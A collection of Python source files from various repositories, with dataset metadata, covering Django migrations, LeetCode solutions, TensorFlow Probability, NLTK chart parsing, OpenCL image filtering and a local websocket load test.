#entity_scores = tf.Print(entity_scores, [entity_scores], message="Scores: ", summarize=25)
return entity_scores | [
"michael.sejr@gmail.com"
] | michael.sejr@gmail.com |
733d22a07c4e1178875dce93e145e10c84489699 | c68d238ac786a42c4dd47d4ab5820709aa4dcdb3 | /ExFin/credit/migrations/0003_creditrateup.py | 2057cb69f91adc42bdaa82ecbdcd2ee1441e312d | [] | no_license | tenebranum/ExFin | b78d2a9651d5b9e8fb0fae3adccc48f7897221d2 | 7ac7b7a0be00537a6a600721009f4a28eb90c3ab | refs/heads/master | 2022-12-14T21:17:02.334600 | 2022-09-21T10:33:27 | 2022-09-21T10:33:27 | 139,338,729 | 0 | 0 | null | 2022-12-08T00:59:15 | 2018-07-01T15:07:52 | Python | UTF-8 | Python | false | false | 1,110 | py | # Generated by Django 2.0.2 on 2018-03-06 14:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('credit', '0002_auto_20180303_1408'),
]
operations = [
migrations.CreateModel(
name='CreditRateUp',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('icon_class', models.CharField(choices=[('cash', 'Наличка'), ('stick-man', 'Пенсионер'), ('sticker', 'Стикер')], max_length=128, verbose_name='Иконка')),
('credit_rate', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='credit.CreditRate', verbose_name='Кредитный тариф')),
],
options={
'verbose_name_plural': 'Популярные кредитные тарифы, вверху на главной',
'verbose_name': 'Популярный кредитный тариф',
},
),
]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
5066a140ff8819c7e2b0f4236f3dadc455c60f9e | 72328633f1b4640868c2ba7af81adcca6350e7da | /07-动态规划/2-动态规划问题/03-064.py | a9ae8d6e8865cff23c72daa24b567b07e52219f0 | [] | no_license | qiaozhi827/leetcode-1 | a9f10192c74a6de498bce0fa7e1d995bf67edec4 | 1d1ffe25d8b49832acc1791261c959ce436a6362 | refs/heads/master | 2022-11-06T19:39:32.792946 | 2020-07-05T06:23:27 | 2020-07-05T06:23:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | class Solution(object):
def minPathSum(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
m = len(grid)
if m == 0:
return 0
n = len(grid[0])
for j in range(1,n):
grid[0][j] += grid[0][j-1]
for i in range(1,m):
grid[i][0] += grid[i-1][0]
for i in range(1,m):
for j in range(1, n):
grid[i][j] = grid[i][j] + min(grid[i-1][j], grid[i][j-1])
return grid[-1][-1]
if __name__ == '__main__':
obj = Solution()
while True:
m = int(input())
grid = []
for i in range(m):
nums_str = input().strip().split()
nums = list(map(int, nums_str))
grid.append(nums)
res = obj.minPathSum(grid)
print(res)
| [
"czy36mengfei@163.com"
] | czy36mengfei@163.com |
0da170eeb4c9c974c1cd842b20ba915ea9ff5e14 | b26c41926fa3a7c2c061132d80e91a2750f2f468 | /tensorflow_probability/python/experimental/util/jit_public_methods.py | 927285368770ee307c5f7c058aa83b3846574dff | [
"Apache-2.0"
] | permissive | tensorflow/probability | 22e679a4a883e408f8ef237cda56e3e3dfa42b17 | 42a64ba0d9e0973b1707fcd9b8bd8d14b2d4e3e5 | refs/heads/main | 2023-09-04T02:06:08.174935 | 2023-08-31T20:30:00 | 2023-08-31T20:31:33 | 108,053,674 | 4,055 | 1,269 | Apache-2.0 | 2023-09-13T21:49:49 | 2017-10-23T23:50:54 | Jupyter Notebook | UTF-8 | Python | false | false | 5,174 | py | # Copyright 2021 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A wrapper to XLA-compile an object's public methods."""
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.distributions import distribution as distribution_lib
from tensorflow_probability.python.distributions import kullback_leibler
__all__ = [
'DEFAULT_METHODS_EXCLUDED_FROM_JIT',
'JitPublicMethods'
]
JAX_MODE = False
NUMPY_MODE = False
DEFAULT_METHODS_EXCLUDED_FROM_JIT = (
# tfd.Distribution
'event_shape',
'event_shape_tensor',
'batch_shape',
'batch_shape_tensor',
'dtype',
'kl_divergence', # Wrapping applied explicitly in `_traced_kl_divergence`.
'experimental_default_event_space_bijector',
'experimental_local_measure',
# tfb.Bijector
# TODO(davmre): Test wrapping bijectors.
'forward_event_shape',
'forward_event_shape_tensor',
'inverse_event_shape',
'inverse_event_shape_tensor',
'forward_dtype',
'inverse_dtype',
'forward_event_ndims',
'inverse_event_ndims',
'experimental_compute_density_correction',
)
if NUMPY_MODE:
JitPublicMethods = lambda f, trace_only=False: f
else:
class JitPublicMethods(object):
"""Wrapper to compile an object's public methods using XLA."""
def __init__(self,
object_to_wrap,
trace_only=False,
methods_to_exclude=DEFAULT_METHODS_EXCLUDED_FROM_JIT):
"""Wraps an object's public methods using `tf.function`/`jax.jit`.
Args:
object_to_wrap: Any Python object; for example, a
`tfd.Distribution` instance.
trace_only: Python `bool`; if `True`, the object's methods are
not compiled, but only traced with `tf.function(jit_compile=False)`.
This is only valid in the TensorFlow backend; in JAX, passing
`trace_only=True` will raise an exception.
Default value: `False`.
methods_to_exclude: List of Python `str` method names not to wrap.
For example, these may include methods that do not take or return
Tensor values. By default, a number of `tfd.Distribution` and
`tfb.Bijector` methods and properties are excluded (e.g.,
`event_shape`, `batch_shape`, `dtype`, etc.).
Default value:
tfp.experimental.util.DEFAULT_METHODS_EXCLUDED_FROM_JIT`
"""
self._object_to_wrap = object_to_wrap
self._methods_to_exclude = methods_to_exclude
self._trace_only = trace_only
@property
def methods_to_exclude(self):
return self._methods_to_exclude
@property
def trace_only(self):
return self._trace_only
@property
def object_to_wrap(self):
return self._object_to_wrap
def copy(self, **kwargs):
return type(self)(self.object_to_wrap.copy(**kwargs),
trace_only=self.trace_only,
methods_to_exclude=self.methods_to_exclude)
def __getitem__(self, slices):
return type(self)(self.object_to_wrap[slices],
trace_only=self.trace_only,
methods_to_exclude=self.methods_to_exclude)
def __getattr__(self, name):
# Note: this method is called only as a fallback if an attribute isn't
# otherwise set.
if name == 'object_to_wrap':
# Avoid triggering an infinite loop if __init__ hasn't run yet.
raise AttributeError()
attr = getattr(self.object_to_wrap, name)
if callable(attr):
if not (name.startswith('_') or name in self.methods_to_exclude):
# On the first call to a method, wrap it, and store the wrapped
# function to be reused by future calls.
attr = tf.function(autograph=False,
jit_compile=not self.trace_only)(attr)
setattr(self, name, attr)
return attr
@kullback_leibler.RegisterKL(JitPublicMethods, distribution_lib.Distribution)
@kullback_leibler.RegisterKL(distribution_lib.Distribution, JitPublicMethods)
@kullback_leibler.RegisterKL(JitPublicMethods, JitPublicMethods)
def _compiled_kl_divergence(d1, d2, name=None):
"""Compiled KL divergence between two distributions."""
trace_only = True
if isinstance(d1, JitPublicMethods):
trace_only &= d1.trace_only
d1 = d1.object_to_wrap
if isinstance(d2, JitPublicMethods):
trace_only &= d2.trace_only
d2 = d2.object_to_wrap
return tf.function(autograph=False, jit_compile=not trace_only)(
d1.kl_divergence)(d2, name=name)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
8e9e7723d0d08bab41f6b2e74af3f118ff5cb2e3 | 53e90091d10a2454e14a02ecc689e355ac2a7cc1 | /book3/pylisting/code_wfst.py | e3d6c5128b16804c82c340c83396238548917d71 | [] | no_license | dougalg/nltk.github.com | aac74cf03d17475adc177ac08691359cb1f4adb6 | 9a04ac5264f5ef08d87d6b920580c9160042f1a0 | refs/heads/master | 2020-12-07T17:15:15.894232 | 2014-04-21T14:11:17 | 2014-04-21T14:11:17 | 18,965,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py | # Natural Language Toolkit: code_wfst
def init_wfst(tokens, grammar):
numtokens = len(tokens)
wfst = [[None for i in range(numtokens+1)] for j in range(numtokens+1)]
for i in range(numtokens):
productions = grammar.productions(rhs=tokens[i])
wfst[i][i+1] = productions[0].lhs()
return wfst
def complete_wfst(wfst, tokens, grammar, trace=False):
index = dict((p.rhs(), p.lhs()) for p in grammar.productions())
numtokens = len(tokens)
for span in range(2, numtokens+1):
for start in range(numtokens+1-span):
end = start + span
for mid in range(start+1, end):
nt1, nt2 = wfst[start][mid], wfst[mid][end]
if nt1 and nt2 and (nt1,nt2) in index:
wfst[start][end] = index[(nt1,nt2)]
if trace:
print("[%s] %3s [%s] %3s [%s] ==> [%s] %3s [%s]" % \
(start, nt1, mid, nt2, end, start, index[(nt1,nt2)], end))
return wfst
def display(wfst, tokens):
print('\nWFST ' + ' '.join([("%-4d" % i) for i in range(1, len(wfst))]))
for i in range(len(wfst)-1):
print("%d " % i, end=" ")
for j in range(1, len(wfst)):
print("%-4s" % (wfst[i][j] or '.'), end=" ")
print()
| [
"stevenbird1@gmail.com"
] | stevenbird1@gmail.com |
c413c0507a2af69c905edbbce39795ea9ae12c2d | c9000e5e30825b29febbefa5ad00da1f57551f8e | /04/zhumeichao/Login.py | b425be01877d8e9766d6f68f886054ccc3d22165 | [] | no_license | xiaotian1991/actual-10-homework | 81c58b24f58fc87e4890f1475ad83de8b66ee53b | 0b379ca6189f843f121df4db5814c83262f9981a | refs/heads/master | 2021-06-12T23:35:52.954510 | 2017-03-24T07:41:18 | 2017-03-24T07:41:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #!/usr/bin/env python
#encoding=utf-8
import Usermod
num=raw_input("<登陆1> <注册2>\n 请输入操作数字:")
if num == '1':
userinfo=Usermod.userlist("user.txt")
Usermod.userlogin(userinfo)
elif num == '2':
userinfo=Usermod.userlist("user.txt")
Usermod.adduser(userinfo,"user.txt")
else:
print "PS:\t输入数字1 ->登陆\n\t输入数字2 ->注册"
| [
"shengxinjing@addnewer.com"
] | shengxinjing@addnewer.com |
2f468e02b23ded4932329802f1f8dbd8609875d0 | 17f1811abda6c828460b77f460671f9c2f464204 | /leetcode/duplicates_list.py | ce3849e0269c3d72f27886e3afb9af07c0d8ac5a | [] | no_license | rishabhranawat/challenge | f10f69fc30881a0571c4321b466a89aeeb06e568 | e836343be5185f8843bb77197fccff250e9a77e3 | refs/heads/master | 2021-01-21T15:13:47.590675 | 2020-04-25T15:26:42 | 2020-04-25T15:26:42 | 91,833,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Problem Source: LeetCode
# Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array),
# some elements appear twice and others appear once.
# Find all the elements that appear twice in this array.
# Could you do it without extra space and in O(n) runtime?
# Example:
# Input:
# [4,3,2,7,8,2,3,1]
# Output:
# [2,3]
### ### ###
def findDuplicates(nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
nums = sorted(nums)
first = 0
second = 1
twice = []
while(second < len(nums)):
if(nums[first] == nums[second]):
twice.append(nums[second])
first += 2
second += 2
else:
first += 1
second += 1
return(twice)
print(findDuplicates([4,3,2,7,8,2,3,1])) | [
"rishabhranawat12345@gmail.com"
] | rishabhranawat12345@gmail.com |
63755929f03cbc64d858991d90397a001ce08a5b | 1b0846fddb7c1e8c09e080db40dca9a9590a2519 | /news_scrap/migrations/0005_auto_20180806_0954.py | e7b63894612a3e74bc3b7d6d63fbee799f71a2e0 | [] | no_license | Serdiuk-Roman/self-written_project | 3d657982e95112fa1031241a8f8e2ee138533450 | 3aa0e733173871c2da692deb1a9346e635f90e75 | refs/heads/master | 2022-12-11T11:25:59.841042 | 2018-08-07T19:53:01 | 2018-08-07T19:53:01 | 143,103,670 | 0 | 0 | null | 2022-12-08T02:19:51 | 2018-08-01T04:25:21 | Python | UTF-8 | Python | false | false | 392 | py | # Generated by Django 2.0.7 on 2018-08-06 09:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news_scrap', '0004_auto_20180627_0759'),
]
operations = [
migrations.AlterField(
model_name='shortnews',
name='news_link',
field=models.URLField(unique=True),
),
]
| [
"serdiuk.r@gmail.com"
] | serdiuk.r@gmail.com |
8385accd5777109597a2d31c8effe9b4dffa447a | 42229d7c76c305cfde63659ad715a4e6bef0ea99 | /goods/test/class_inside_distance.py | 20bc5d36fc8d67eb626ddc098a24d94d68ce79a3 | [] | no_license | LRJliurj/GoodsServer | 4a043d2f1195e4793aad327732201375495a88f9 | c8c1bbda4fa4ba2a0e8a4055a67b7278ddb15b03 | refs/heads/master | 2020-07-05T14:03:58.536658 | 2019-09-24T03:01:53 | 2019-09-24T03:01:53 | 202,668,466 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | __author__ = 'admin'
# *_*coding:utf-8 *_*
import numpy as np
import os
from goods.util import distance_util
#计算单个商品类内差异值
def inside_distance(img_feature_path,img_dis_path):
img_features = {}
with open(img_feature_path,'r') as f:
lines = f.readlines()
for line in lines:
feature = line.split(",")
filename = feature[0]
feature = feature[1:]
feat = []
for fea in feature:
feat.append(float(fea))
img_features[filename] = feat
img_dis={}
for img_feature1 in img_features:
for img_feature2 in img_features:
print (len(img_features[img_feature1]))
print(len(img_features[img_feature2]))
dis = distance_util.pcos(img_features[img_feature1],img_features[img_feature2])
img_dis[img_feature1+"---"+img_feature2] = dis
print (img_feature1+"---"+img_feature2,str(dis))
a = sorted(img_dis.items(), key=lambda x: x[1], reverse=True)
print (a)
with open(img_dis_path,'w') as f:
for key in a:
f.write(key[0]+","+str(float(key[1])))
f.write("\n")
if __name__=='__main__':
# 布雷柯蒂斯距离
img_feature_path = "E:\\opt\\data\\feature_top\\69024894.txt"
img_dis_path = "E:\\opt\\data\\feature_top\\step2_inside_cos\\69024894.txt"
inside_distance(img_feature_path,img_dis_path)
| [
"908601417@qq.com"
] | 908601417@qq.com |
937536e97205603aaafc55317b87850a6abf7d9e | 54f395d77fd98fce2e42f9883953118a4cd74cf8 | /test/socket_overload.py | 96ca82600e39f9deba4e315164d0ed83b6752451 | [] | no_license | zdimon/angular-chat | bfdaa0cb5861da03764402202179711edb92c131 | 483ddf675e8c6233b3a0642b9aa86fe058ef9e44 | refs/heads/master | 2020-04-06T05:30:52.957098 | 2017-01-31T12:12:00 | 2017-01-31T12:12:00 | 39,195,268 | 0 | 1 | null | 2015-09-08T13:27:47 | 2015-07-16T12:21:08 | Python | UTF-8 | Python | false | false | 1,090 | py | import websocket
from websocket import create_connection
import logging
import json
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '../djapp'))
import brukva
bclient = brukva.Client()
bclient.connect()
import time
def test_brukva():
mes = { 'action': 'close_room' }
print 'send to test_test'
for i in range(1000000):
bclient.publish('test_test', json.dumps(mes))
def test():
def on_message(ws, message):
print message
def on_error(ws, error):
#print error
print 'errrrrr'
def on_close(ws):
print "### closed ###"
def on_open(ws):
print 'start serve'
data = { 'action': 'connect', 'tpa': 'test', 'user_id': '150032', 'source': 'site' }
ws.send(json.dumps(data))
ws = websocket.WebSocketApp("ws://localhost:8889/ws",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.on_open = on_open
ws.run_forever()
ws.close()
if __name__ == '__main__':
test()
import sys
sys.exit("quit")
| [
"zdimon77@gmail.com"
] | zdimon77@gmail.com |
3c89317045ceea3ccaeb459a84d66c919258d4ca | 4e02d5b0b1b0739553fd40bbbdfb0d02c9830350 | /0387_First_Unique_Character_in_a_String.py | 5434e1b8da203b3a94bc89b9f30006df155d5acb | [] | no_license | bingli8802/leetcode | b039ab6af62f0c8992463393f561caafd21056e6 | a509b383a42f54313970168d9faa11f088f18708 | refs/heads/master | 2023-03-29T03:11:45.801090 | 2021-03-23T22:55:16 | 2021-03-23T22:55:16 | 279,321,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class Solution(object):
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
if not s:
return -1
res = float('inf')
dic = defaultdict(list)
for i, v in enumerate(s):
dic[v].append(i)
for val in dic.values():
if len(val) == 1:
res = min(res, val[0])
if res == float('inf'):
return -1
else:
return res
# if index are the same
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
for i in s:
if s.find(i) == s.rfind(i):
return s.find(i)
return -1
| [
"noreply@github.com"
] | bingli8802.noreply@github.com |
ca1f2f962c2c3961e8d6261325d768ab71aad657 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/1267.py | f52e8c78ada28936bf0480feb093bd78584889c3 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | #!/usr/bin/env python
# vim: set filetype=python et sw=4 ts=4:
import sys
sys.setrecursionlimit(1024*1024)
T = int(sys.stdin.readline())
def seconds_to_reach(target, rate):
return target/rate
def solve(C, F, X, rate):
seconds_if_buy = seconds_to_reach(C, rate) + seconds_to_reach(X, rate+F)
seconds_if_wait = seconds_to_reach(X, rate)
if (seconds_if_buy < seconds_if_wait):
seconds = seconds_to_reach(C, rate) + solve(C, F, X, rate+F)
else:
seconds = seconds_if_wait
return seconds
for case in xrange(T):
C, F, X = [float(x) for x in sys.stdin.readline().split()]
sys.stdout.write("Case #%d: %.7f" % (case + 1, solve(C, F, X, 2.0)))
sys.stdout.write("\n")
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
163b4a862ee387590032965b8fa924cb93c8285d | c68c841c67f03ab8794027ff8d64d29356e21bf1 | /Two Sum.py | 3abbd4c8b7c4aa74e47f5b64b07dc156c8fd010a | [] | no_license | jke-zq/my_lintcode | 430e482bae5b18b59eb0e9b5b577606e93c4c961 | 64ce451a7f7be9ec42474f0b1164243838077a6f | refs/heads/master | 2020-05-21T20:29:11.236967 | 2018-06-14T15:14:55 | 2018-06-14T15:14:55 | 37,583,264 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,182 | py | class Solution:
"""
@param numbers : An array of Integer
@param target : target = numbers[index1] + numbers[index2]
@return : [index1 + 1, index2 + 1] (index1 < index2)
"""
def twoSum(self, numbers, target):
# write your code here
# if not numbers:
# return []
# sortedList = []
# for i, n in enumerate(numbers):
# sortedList.append((n, i))
# sortedList.sort()
# length = len(numbers)
# left, right = 0, length - 1
# while left < right:
# total = sortedList[left][0] + sortedList[right][0]
# if total > target:
# right -= 1
# elif total < target:
# left += 1
# else:
# return sorted([sortedList[left][1] + 1, sortedList[right][1] + 1])
# left += 1
# right -= 1
hashVal = {}
length = len(numbers)
for i in range(length):
if target - numbers[i] in hashVal:
return [hashVal[target - numbers[i]], i + 1]
hashVal[numbers[i]] = i + 1
return [-1, -1] | [
"jke0zq@gmail.com"
] | jke0zq@gmail.com |
330d730d2bb745c574dbbb58a796b26d37a5afcb | 92e6f33a01b8f9e1e3b4914c67fbd6789a6abaac | /pygenic/backend/Backend.py | d9df99f5aaa80256e399441ad091bf558aad567c | [] | no_license | daeken/pygenic | 9a4b5b31eeca53b228999508d4f19bf56808cfaf | 8878a8bfdfb823a9143548a1de8e19c15c62523d | refs/heads/master | 2021-01-17T16:09:30.498552 | 2016-07-28T03:45:43 | 2016-07-28T03:45:43 | 61,535,924 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | from pygenic import *
class Backend(object):
backends = {}
@staticmethod
def register(cls):
Backend.backends[cls.__name__.lower()] = cls
return cls
ws = '\t'
def __init__(self, hexLiterals=True):
self.temp_i = 0
self.hexLiterals = hexLiterals
def tempname(self, prefix='temp'):
self.temp_i += 1
return '__%s_%i' % (prefix, self.temp_i)
def generate(self, node):
if isinstance(node, Node):
self.output = ''
self.indentation = 0
self.generate(node.sexp(byName=True))
return self.output
elif not isinstance(node, tuple):
return self.Value(node)
return getattr(self, node[0])(*node[1:])
def passthru(self, *args):
for arg in args:
ret = self.generate(arg)
if ret is not None:
self.emit(ret)
Module = passthru
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
db2576d2ad6f96a0a3c6a41291d124e0c66a19c4 | 991c4f5318d090b937a6f6d2e9639612c5366724 | /simple_eyetracker/image_processing/simple_cl_conv.py | 3d5c564d9862549a976a2802fbaf067913d5406f | [] | no_license | coxlab/simple_eyetracker | d7da3c680e5a7f5d70bec2d2ab7596b419d3f8d8 | b857eb1e671d1751d3c58f9c59184432caadcdd0 | refs/heads/master | 2021-03-22T01:10:11.178095 | 2017-09-28T20:49:54 | 2017-09-28T20:49:54 | 102,738,996 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,230 | py |
import pyopencl as cl
import pyopencl.array as cl_array
from pyopencl import clmath
from pyopencl.elementwise import ElementwiseKernel
import numpy as np
import numpy.testing as nptest
from localmem_cl_conv import LocalMemorySeparableCorrelation
class NaiveSeparableCorrelation:
def __init__(self, ctx, queue):
self.ctx = ctx
self.queue = queue
code = """
__kernel void separable_correlation_row(__global float *result,
__global const float *input,
int image_width,
int image_height,
__global const float *kernel_row,
int kernel_width){
const int kernel_radius = kernel_width / 2;
int row = get_global_id(0);
int col = get_global_id(1);
float sum = 0.0;
int im_index = row * image_width + col;
for(int i = 0; i < kernel_width; i++){
int k = i - kernel_radius;
if( (col + k) < 0 ){
k *= -1;
k -= 1;
}
if( (col + k) >= image_width){
k *= -1;
k += 1;
}
sum += input[im_index + k] * kernel_row[i];
}
result[im_index] = sum;
return;
}
__kernel void separable_correlation_col(__global float *result,
__global const float *input,
int image_width,
int image_height,
__global const float *kernel_col,
int kernel_width){
const int kernel_radius = kernel_width / 2;
int row = get_global_id(0);
int col = get_global_id(1);
float sum = 0.0;
for(int i = 0; i < kernel_width; i++){
int k = i - kernel_radius;
if( (row + k) < 0 ){
k *= -1;
k -= 1;
}
if( (row + k) >= image_height ){
k *= -1;
k += 1;
}
int im_index = (row + k) * image_width + col;
sum = sum + input[im_index]*kernel_col[i];
}
result[row * image_width + col] = sum;
}
"""
program = cl.Program(self.ctx, code).build()
class ProgramProxy:
def __init__(self, prog):
self.separable_correlation_row = prog.separable_correlation_row
self.separable_correlation_col = prog.separable_correlation_col
self.program = ProgramProxy(program)
def __call__(self,
input_buf,
row_buf,
col_buf,
output_buf,
intermed_buf=None):
(h, w) = input_buf.shape
r = row_buf.shape[0]
c = col_buf.shape[0]
if intermed_buf is None:
intermed_buf = cl_array.empty_like(input_buf)
self.program.separable_correlation_row(self.queue,
(h, w),
None,
intermed_buf.data,
input_buf.data,
np.int32(w), np.int32(h),
row_buf.data,
np.int32(r))
self.program.separable_correlation_col(self.queue,
(h, w),
None,
output_buf.data,
intermed_buf.data,
np.int32(w), np.int32(h),
col_buf.data,
np.int32(c))
class Sobel:
def __init__(self, ctx, queue, dtype=np.float32):
self.ctx = ctx
self.queue = queue
sobel_c = np.array([1., 0., -1.]).astype(dtype)
sobel_r = np.array([1., 2., 1.]).astype(dtype)
self.sobel_c = cl_array.to_device(self.queue, sobel_c)
self.sobel_r = cl_array.to_device(self.queue, sobel_r)
self.scratch = None
self.sepconv_rc = LocalMemorySeparableCorrelation(self.ctx, self.queue, sobel_r, sobel_c)
self.sepconv_cr = LocalMemorySeparableCorrelation(self.ctx, self.queue, sobel_c, sobel_r)
TYPE = ""
if dtype == np.float32:
TYPE = "float"
elif dtype == np.uint8:
TYPE = "unsigned char"
elif dtype == np.uint16:
TYPE = "unsigned short"
self.mag = ElementwiseKernel(ctx,
"float *result, %s *imgx, %s *imgy" % (TYPE, TYPE),
"result[i] = sqrt((float)imgx[i]*imgx[i] + (float)imgy[i]*imgy[i])",
"mag")
def __call__(self,
input_buf,
imgx_buf,
imgy_buf,
mag_buf):
if self.scratch is None or self.scratch.shape != input_buf.shape:
self.scratch = cl_array.empty_like(input_buf)
self.sepconv_cr(input_buf, self.sobel_c, self.sobel_r, imgx_buf, self.scratch)
self.sepconv_rc(input_buf, self.sobel_r, self.sobel_c, imgy_buf, self.scratch)
self.mag(mag_buf, imgx_buf, imgy_buf)
def cl_test_sobel(im):
ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
sobel = Sobel(ctx, queue)
im_buf = cl_array.to_device(queue, im)
mag_buf = cl_array.empty_like(im_buf)
imgx_buf = cl_array.empty_like(im_buf)
imgy_buf = cl_array.empty_like(im_buf)
sobel(im_buf, imgx_buf, imgy_buf, mag_buf)
return (mag_buf.get(), imgx_buf.get(), imgy_buf.get())
if __name__ == '__main__':
import matplotlib.pylab as plt
if True:
test_im = np.random.rand(217, 101).astype(np.float32)
row_k = np.random.rand(5,).astype(np.float32)
col_k = np.random.rand(5,).astype(np.float32)
elif False:
a = np.array(range(10, 1, -1), dtype=np.float32)
test_im = np.outer(a, a)
row_k = np.array([1, 2, 3]).astype(np.float32)
col_k = np.array([5, 6, 7]).astype(np.float32)
else:
test_im = np.ones([10, 10]).astype(np.float32)
row_k = np.array([1, 2, 3]).astype(np.float32)
col_k = np.array([2, 4, 5]).astype(np.float32)
ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
in_buf = cl_array.to_device(queue, test_im)
row_buf = cl_array.to_device(queue, row_k)
col_buf = cl_array.to_device(queue, col_k)
out_buf = cl_array.empty_like(in_buf)
imgx_buf = cl_array.empty_like(in_buf)
imgy_buf = cl_array.empty_like(in_buf)
mag_buf = cl_array.empty_like(in_buf)
# Test the Sobel
sobel = Sobel(ctx, queue)
sobel(in_buf, imgx_buf, imgy_buf, mag_buf)
print(imgx_buf.get())
print(mag_buf.get())
# Test the conv
#conv = NaiveSeparableCorrelation(ctx, queue)
conv = LocalMemorySeparableCorrelation(ctx, queue)
conv(in_buf, row_buf, col_buf, out_buf)
full_kernel = np.outer(col_k, row_k)
print(full_kernel)
from scipy.signal import correlate2d as c2d
gt = c2d(test_im, full_kernel, mode='same', boundary='symm')
# print "Input: "
# print(test_im)
# print "ground truth"
# print(gt)
# print "cl output"
# print(out_buf.get())
# print "diff"
# print(gt - out_buf.get())
if not np.allclose(gt, out_buf.get()):
plt.imshow(gt - out_buf.get())
plt.show()
| [
"david.daniel.cox@gmail.com"
] | david.daniel.cox@gmail.com |
80a9a0385609f6092de63c881530a49feb80b62d | 09fd456a6552f42c124c148978289fae1af2d5c3 | /LinkedList/21.py | bbf74d969562ffdc2b3217be6edda17bdc828f3b | [] | no_license | hoang-ng/LeetCode | 60b4e68cbcf54cbe763d1f98a70f52e628ab32fb | 5407c6d858bfa43325363503c31134e560522be3 | refs/heads/master | 2021-04-10T11:34:35.310374 | 2020-07-28T10:22:05 | 2020-07-28T10:22:05 | 248,932,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | # 21. Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
# Example:
# Input: 1->2->4, 1->3->4
# Output: 1->1->2->3->4->4
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def mergeTwoLists(self, l1, l2):
if l1 == None:
return l2
if l2 == None:
return l1
dummy = ListNode(0)
current = dummy
while l1 != None and l2 != None:
if l1.val < l2.val:
current.next = l1
l1 = l1.next
else:
current.next = l2
l2 = l2.next
current = current.next
if l1 != None:
current.next = l1
if l2 != None:
current.next = l2
return dummy.next
def mergeTwoLists2(self, l1, l2):
if l1 == None:
return l2
if l2 == None:
return l1
if l1.val < l2.val:
l1.next = self.mergeTwoLists2(l1.next, l2)
return l1
else:
l2.next = self.mergeTwoLists2(l1, l2.next)
return l2 | [
"hoang2109@gmail.com"
] | hoang2109@gmail.com |
9e3718eabb1635e6485630419714c693a7599cdd | 705c2cf0ae1f38efb2340a056b0e78f89f83ec5e | /security_checks/mplcursors_interactive.py | a5758e070897d880410b40de7b7bbeebf9c67b42 | [] | no_license | Vital-Fernandez/vital_tests | 42fad619841d4b57c5ab419e6f58eef523ff8566 | ee8dbc9c09e433f91e78f9ea16977a9e5a44be6c | refs/heads/master | 2023-09-01T21:27:32.160440 | 2023-08-21T20:51:59 | 2023-08-21T20:51:59 | 235,336,802 | 0 | 1 | null | 2022-10-19T08:52:42 | 2020-01-21T12:24:57 | Python | UTF-8 | Python | false | false | 978 | py | # import numpy as np
# import matplotlib.pyplot as plt
# import mplcursors
#
# x = np.linspace(0, 10, 100)
#
# fig, ax = plt.subplots()
# ax.set_title("Click on a line to display its label")
#
# # Plot a series of lines with increasing slopes.
# for i in range(1, 20):
# ax.plot(x, i * x, label=f"$y = {i}x$")
#
# # Use a Cursor to interactively display the label for a selected line.
# mplcursors.cursor().connect(
# "add", lambda sel: sel.annotation.set_text(sel.artist.get_label()))
#
# plt.show()
import matplotlib.pyplot as plt
import numpy as np
import mplcursors
data = np.outer(range(10), range(1, 5))
fig, ax = plt.subplots()
# lines = ax.plot(data)
# ax.set_title("Click somewhere on a line.\nRight-click to deselect.\n"
# "Annotations can be dragged.")
lines = ax.plot(range(3), range(3), "o")
labels = ["a", "b", "c"]
cursor = mplcursors.cursor(lines)
cursor.connect("add", lambda sel: sel.annotation.set_text(labels[sel.index]))
plt.show() | [
"vital.fernandez@gmail.com"
] | vital.fernandez@gmail.com |
